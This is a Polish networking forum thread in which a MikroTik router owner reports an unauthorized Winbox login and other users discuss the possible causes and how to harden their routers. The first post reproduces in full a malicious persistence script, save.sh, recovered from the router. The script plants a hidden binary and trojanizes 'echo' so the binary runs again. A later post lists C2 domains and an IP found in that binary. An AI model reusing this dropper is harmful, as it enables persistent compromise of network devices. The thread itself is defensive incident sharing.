Trzepak.pl

Regulamin forum


Wypowiedzi muszą stosować się do zasad ogólnie przyjętej "netykiety" wynikającej z dokumentu RFC 1855, zamieszczonego pod tym adresem:
http://www.ietf.org/rfc/rfc1855.txt
Osoby wypowiadające się tu "zawodowo" proszone są o logowanie się swoim imieniem i nazwiskiem, a w stopce ich wypowiedzi wskazane jest przedstawienie danych adresowych łącznie z linkiem do strony głównej przedsiębiorstwa lub organizacji, którą reprezentują.
Umieszczanie informacji reklamowych w wypowiedzi i w stopce nie jest wskazane a moderatorzy mogą ingerować usuwając takie posty w sposób nie podlegający dyskusji.



Nowy temat  Odpowiedz w temacie
Przejdź na stronę 1 2 3 4 5 6 Następna
Autor Wiadomość
Post: pt, 20 kwie 2018 17:45:35 
Odpowiedz z cytatem
Online
Leniwy eseista
Leniwy eseista

Rejestracja: pn, 13 lip 2015 20:13:35
Posty: 502
Zauważyłem dziś nietypowe logowanie do mojego routera wystawionego na zewn ip.
Router miał wystawiony jedynie winbox 8129, ssh na zmienionym wysokim porcie i pptp na domyślnym porcie. Wersja 6.41.3
Hasło było losowe(!) i nigdzie indziej nie używane. Komputer z którego się logowałem jest czysty.
Obrazek

Zdziwiłem się strasznie i zacząłem przeglądać logi router wstecz - nie znalazłem żadnego połączenia o tej porze z tego IP... Ale pliki i logowania na router jakimś cudem się tu pokazały.
Zaktualizowałem go do najnowszej wersji i ściągnąłem go całkowicie z zewnątrz.

Na szczęście Files znalazłem dwa pliki: save.sh i dnstest.
Może ich zawartość w czymś pomoże:
save.sh
Kod:
#!/bin/ash
case "$PATH" in
   */usr/local/bin*)
   # old versions
      dest="/usr/local/bin/"
   ;;
   *)
      dest="/flash/bin/"
      if [ ! -d "/flash/" ]; then
         exit 1
      fi
   ;;
esac


if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi

mkdir -p $dest

export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest

echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test

echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh


dnstest to plik binarny, mogę podesłać po kontakcie na pw.


Ostatnio zmieniony pt, 20 kwie 2018 21:47:39 przez thekrzos, łącznie zmieniany 1 raz.

Na górę
Post: pt, 20 kwie 2018 18:08:28 
Odpowiedz z cytatem
Online
Leniwy eseista
Leniwy eseista

Rejestracja: pn, 13 lip 2015 20:13:35
Posty: 502
Przeglądając binarnie dnstest natrafiłem na dwa adresy:
hxxp://marchdom4.com/mikrotik;hxxp://ma ... m/mikrotik
Na tą chwilę domeny rozwiązują się tym samym adresem IP
marchdom4.com [162.212.182.119]
march10dom5.com [162.212.182.119]

Próba odpytania adresu skutkuje odpowiedzią "404 page not found", nawet z useragentem podobnym do MT.


Na górę
Post: pt, 20 kwie 2018 19:25:32 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik

Rejestracja: ndz, 27 lip 2014 13:37:16
Posty: 1031
Jak mocne to haslo bylo?
Ile znakow, jakie rodzaje znakow?
Na ta chwile wyglada na to, ze ktos CI go po prostu brute forcem rozwalil :-)

Swoja droga - zawsze podziwialem ludzi otwierajacych np na routerach uslugi takie jak ssh czy winbox na swiat bez zadnych ograniczen. TO proszenie sie o problemy


Na górę
Post: pt, 20 kwie 2018 20:36:26 
Odpowiedz z cytatem
Online
Leniwy eseista
Leniwy eseista

Rejestracja: pn, 13 lip 2015 20:13:35
Posty: 502
16 znaków - duże, małe litery, cyfry + specjalne. Robione generatorem.
Bruteforce i 3 próby hasła? no to raczej nei jest możliwe trafienie w hasło podobne do tego - NMYAwmg=Y+9BWp*W
Nie było wcześniej żadnych innych prób logowania, logi mam wysyłane również na zewnętrzny syslog, więc tam bym to zauważył.


Na górę
Post: pt, 20 kwie 2018 20:52:42 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik

Rejestracja: ndz, 27 lip 2014 13:37:16
Posty: 1031
BArdzo dziwne..... Przy takim hasle bruteforce raczej odpada.
Moze atak na winboxa i zapisane haslo?


Na górę
Post: pt, 20 kwie 2018 21:09:04 
Odpowiedz z cytatem
Online
Leniwy eseista
Leniwy eseista

Rejestracja: pn, 13 lip 2015 20:13:35
Posty: 502
sniper pisze:
BArdzo dziwne..... Przy takim hasle bruteforce raczej odpada.
Moze atak na winboxa i zapisane haslo?


Hasło nie było zapisane w winboxie, tzn było, ale z wewnętrznym IP. Ten router (a dokładniej to switch) miał przypisane zewnętrzne IP tylko w przypadku jakiegoś fuckupu. Nie był routerem itd.
Jak potrzebowałem połączyć się z zewnętrznym, to wpisywałem ręcznie IP.
Komp czysty.

Gdyby atak poszedł z zapisanych MT na moim PC, to poszło by 20 innych Mikrotików, a na innych cisza, mimo że były wystawione tak samo w świat :sciana: Już nie są.


Na górę
Post: pt, 20 kwie 2018 21:20:14 
Odpowiedz z cytatem
Online
Leniwy eseista
Leniwy eseista

Rejestracja: pn, 13 lip 2015 20:13:35
Posty: 502
To na 100% jest jakaś dziura.
Sprawdziłem inny router, którego nie miałem zapisanego na komputerze.
Obrazek

Wyglada za pierwsza proba logowania - tu gdzies jakimś cudem zbiera hasła z routera i później się loguje pierwszym lepszym.

EDIT:
Ewidentnie włamanie przez winbox.
Nie jest mozliwe przecież zrobienie bruteforce z JEDNĄ próbą logowania...

Z logów:
- Próba zalogowania się na MT (tu prawdopodobnie zgrywane są jakimś cudem hasła i loginy)
- Zalogowanie się loginem, który ma uprawnienia full
- Uruchomienie SSH / Zmiana portu
- Wgranie syfu po ssh i próba uruchomienia go
- Wylogowanie jak gdyby nigdy nic się nie stało

Na szczęście na 6.41.3 się to nie wykonuje, ale nadal jest problem - można się zalogować nie znając hasła do routera.


Na górę
Post: pt, 20 kwie 2018 21:57:05 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik

Rejestracja: pt, 24 lip 2009 11:30:07
Posty: 1348
Lokalizacja: Polska
Ciężkie jest życie admina, jak nie UBNT do MT :/


Na górę
Post: sob, 21 kwie 2018 0:18:25 
Odpowiedz z cytatem
Offline
trzepakowy master
trzepakowy master
Awatar użytkownika

Rejestracja: pn, 01 mar 2004 17:24:42
Posty: 16553
Lokalizacja: Nowa Ruda
0-day na Mikrotika ;)

_________________
brk.network.devices - sieci komputerowe
http://devices.pl/


Na górę
Post: sob, 21 kwie 2018 0:35:28 
Odpowiedz z cytatem
Offline
trzepakowy szaleniec
trzepakowy szaleniec

Rejestracja: wt, 17 lut 2009 0:15:58
Posty: 2916
Lokalizacja: Kraków
djlech pisze:
Ciężkie jest życie admina, jak nie UBNT do MT :/


nie takie bardzo :) MT nie mam ... a ubnt nie wystawiam na publiku


Na górę
Post: sob, 21 kwie 2018 1:15:12 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik
Awatar użytkownika

Rejestracja: śr, 14 gru 2005 18:36:09
Posty: 1380
Lokalizacja: Dąbrowa Górnicza
Coś jest na rzeczy, pomimo blokady z zewnątrz na portach 80, 21, 22, 23 również obserwuję pewne anomalie w połączeniach do MT i z MT na sofcie poniżej 6.41.3. W każdym przypadku port 8291 jest otwarty i nic poza nim.


Wysłane z iPhone za pomocą Tapatalk

_________________
Marcin Hajka
ConnectIT
AS56783


Na górę
Post: sob, 21 kwie 2018 8:37:02 
Odpowiedz z cytatem
Offline
Młodszy czytelnik
Młodszy czytelnik

Rejestracja: ndz, 03 sty 2010 19:09:24
Posty: 79
thekrzos pisze:
To na 100% jest jakaś dziura.
Sprawdziłem inny router, którego nie miałem zapisanego na komputerze.
Obrazek

Wyglada za pierwsza proba logowania - tu gdzies jakimś cudem zbiera hasła z routera i później się loguje pierwszym lepszym.

EDIT:
Ewidentnie włamanie przez winbox.
Nie jest mozliwe przecież zrobienie bruteforce z JEDNĄ próbą logowania...

Z logów:
- Próba zalogowania się na MT (tu prawdopodobnie zgrywane są jakimś cudem hasła i loginy)
- Zalogowanie się loginem, który ma uprawnienia full
- Uruchomienie SSH / Zmiana portu
- Wgranie syfu po ssh i próba uruchomienia go
- Wylogowanie jak gdyby nigdy nic się nie stało

Na szczęście na 6.41.3 się to nie wykonuje, ale nadal jest problem - można się zalogować nie znając hasła do routera.
Może zgłoś to łotysza

Wysłane z mojego SM-G900F przy użyciu Tapatalka


Na górę
Post: sob, 21 kwie 2018 8:38:17 
Odpowiedz z cytatem
Online
Leniwy eseista
Leniwy eseista

Rejestracja: pn, 13 lip 2015 20:13:35
Posty: 502
Napisałem na forum MT i do nich

Wysłane z mojego Redmi Note 3 przy użyciu Tapatalka


Na górę
Post: sob, 21 kwie 2018 9:01:01 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik

Rejestracja: sob, 30 sie 2014 20:03:43
Posty: 1077
Ale żeby telnet'u w ogóle nie zablokować to już przesada :)


Na górę
Post: sob, 21 kwie 2018 9:11:37 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik

Rejestracja: ndz, 27 lip 2014 13:37:16
Posty: 1031
A potem piszecie, ze ciezkie jest zycie admina. 8(


Na górę
Post: sob, 21 kwie 2018 10:23:30 
Odpowiedz z cytatem
Offline
trzepakowy master
trzepakowy master

Rejestracja: śr, 12 mar 2008 16:12:35
Posty: 8732
Abstrahując od problemu - przy upgradzie z 6.34.6 i 6.36.2 do 6.42 może się zdarzyć że sprzęt się nie podniesie. Sprawdzone w nocy na x86 :)
Po restarcie prądowym jest już ok, ale lepiej nie robić wszystkiego tylko zdalnie :)

_________________
www.fiberion.pl


Na górę
Post: sob, 21 kwie 2018 10:38:11 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik

Rejestracja: pt, 24 lip 2009 11:30:07
Posty: 1348
Lokalizacja: Polska
Ja po akcji z UBNT mam zmienione wszystkie porty na UBNT ssh, http, https.

Na MikroTiku mam włączone tylko ssh na zmienionym porcie oraz winbox na oryginalnym porcie.

Na brzegówce (RB) mam ustawione, że mogę się łączyć do w/w portów tylko z jednego zewnętrznego adresu IP na resztę mam drop.

Następnie na samej brzegówce mam wyłączone wszystkie usługi poza ssh na zmienionym porcie.

Na razie nic się nie dzieje, ale jak wymyślą bezpieczną wersję to zacznę robić update.


Na górę
Post: sob, 21 kwie 2018 13:00:55 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik
Awatar użytkownika

Rejestracja: śr, 28 lis 2007 16:11:06
Posty: 1452
Lokalizacja: Stalowa
wylacz dns na mt i zobaczysz ze ustąpi :P
+ ip - services pozmieniaj porty

_________________
DeVeloPer PreView


Na górę
Post: sob, 21 kwie 2018 13:25:21 
Odpowiedz z cytatem
Online
Leniwy eseista
Leniwy eseista

Rejestracja: pn, 13 lip 2015 20:13:35
Posty: 502
nerxu pisze:
wylacz dns na mt i zobaczysz ze ustąpi :P
+ ip - services pozmieniaj porty

Chyba nie rozumiesz, co się tu stało.
DNS był od dawna wycięty.
Wystawiony jedynie winbox i SSH.
Ktoś jakąś dziurą/backdoorem za pierwszym niepoprawnym logowaniem pobiera wszystkich użytkowników i hasła do nich, drugim logowaniem wgrywa jakiś syf na router (na 6.41.3 się nie wykona) i tyle.
Nie chodzi mi o wgranie tych plików. Chodzi mi o NIEAUTORYZOWANE LOGOWANIE NA ROUTER BEZ ZNAJOMOŚCI HASŁA.
I nie jest to bruteforce, bo to nie jest możliwe robiąc dwa podejścia. Hasła losowe, przykład podałem wyżej. Każdy router miał inne hasło.


Na górę
Post: sob, 21 kwie 2018 13:49:28 
Odpowiedz z cytatem
Offline
Moderator
Moderator
Awatar użytkownika

Rejestracja: czw, 18 lis 2010 9:00:53
Posty: 3618
Lokalizacja: Mazury
A wcześniej nie miałeś może otwartego portu www ? Albo przypadkowo nie usunąłeś wszystkich zbędnych plików z mt?
Ogólne skanowali port winbox, po tym określali że to mt i wbijali się po www.

_________________
# http://kazuko.pl ☚☜☚☜ synchronizacja LMS -> MikroTik (DHCP, PPPoE, Simple Queue) po API !!!


Na górę
Post: sob, 21 kwie 2018 13:56:40 
Odpowiedz z cytatem
Online
Leniwy eseista
Leniwy eseista

Rejestracja: pn, 13 lip 2015 20:13:35
Posty: 502
Nie miałem otwartego portu www, pisałem wyżej. Sam winbox i SSH.


Na górę
Post: sob, 21 kwie 2018 13:58:41 
Odpowiedz z cytatem
Offline
Moderator
Moderator
Awatar użytkownika

Rejestracja: czw, 18 lis 2010 9:00:53
Posty: 3618
Lokalizacja: Mazury
a pliku binarnego z konfiguracją nie wysyłałeś nikomu? Nie wpadły w niepowołane ręce?

_________________
# http://kazuko.pl ☚☜☚☜ synchronizacja LMS -> MikroTik (DHCP, PPPoE, Simple Queue) po API !!!


Na górę
Post: sob, 21 kwie 2018 15:06:51 
Odpowiedz z cytatem
Offline
Powieściopisarz
Powieściopisarz

Rejestracja: śr, 27 sie 2008 12:30:17
Posty: 1733
Lokalizacja: szczecin
thekrzos pisze:
Nie miałem otwartego portu www, pisałem wyżej. Sam winbox i SSH.

+telnet

_________________
http://www.mierzyn.net - Internet Mierzyn


Na górę
Post: sob, 21 kwie 2018 15:09:01 
Odpowiedz z cytatem
Online
Leniwy eseista
Leniwy eseista

Rejestracja: pn, 13 lip 2015 20:13:35
Posty: 502
mpmac pisze:
thekrzos pisze:
Nie miałem otwartego portu www, pisałem wyżej. Sam winbox i SSH.

+telnet

Telnet byl zamknięty na pierwszym routerze i wycięty firewallem przed nim.
Drugi screen, to router brzegowy gdzie telnet byl wyłączony w IP Services, ale przez tego kogoś został uruchomiony.

Wysłane z mojego Redmi Note 3 przy użyciu Tapatalka


Na górę
Post: ndz, 22 kwie 2018 9:51:37 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik
Awatar użytkownika

Rejestracja: pt, 14 sty 2011 0:36:15
Posty: 1406
Lokalizacja: Jaworzno
Polecam:
http://joshaven.com/resources/tricks/mi ... ress-list/

Większość sieci z których były te ataki znajdują się na tej liście. U mnie czysto na wszystkich routerach MT, ale:

1. Telnety, www, api wyłączone
2. SSH, winbox dostępne tylko dla określonych IP, na kilku wyłączone od strony WAN (dostęp z vpn). Porty zmienione z domyślnych

Co nie zmienia faktu, że ten przypadek jest interesujący ze względu na poprawne zalogowanie się "bota".

_________________
netmon.pl


Na górę
Wyświetl posty nie starsze niż:  Sortuj wg  
Nowy temat  Odpowiedz w temacie
Przejdź na stronę 1 2 3 4 5 6 Następna


Kto jest online

Użytkownicy przeglądający to forum: Obecnie na forum nie ma żadnego zarejestrowanego użytkownika i 24 gości


Nie możesz tworzyć nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz dodawać załączników

Szukaj:
Przejdź do:  
Dzisiaj jest pt, 06 gru 2019 17:09:18

Strefa czasowa UTC+02:00

Moderatorzy: Administratorzy, Moderatorzy

Nakarm glodne dziecko - wejdz na strone www.Pajacyk.pl


Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
SubSilver2 modified for Trzepak.pl by Colir
Polski pakiet językowy dostarcza phpBB.pl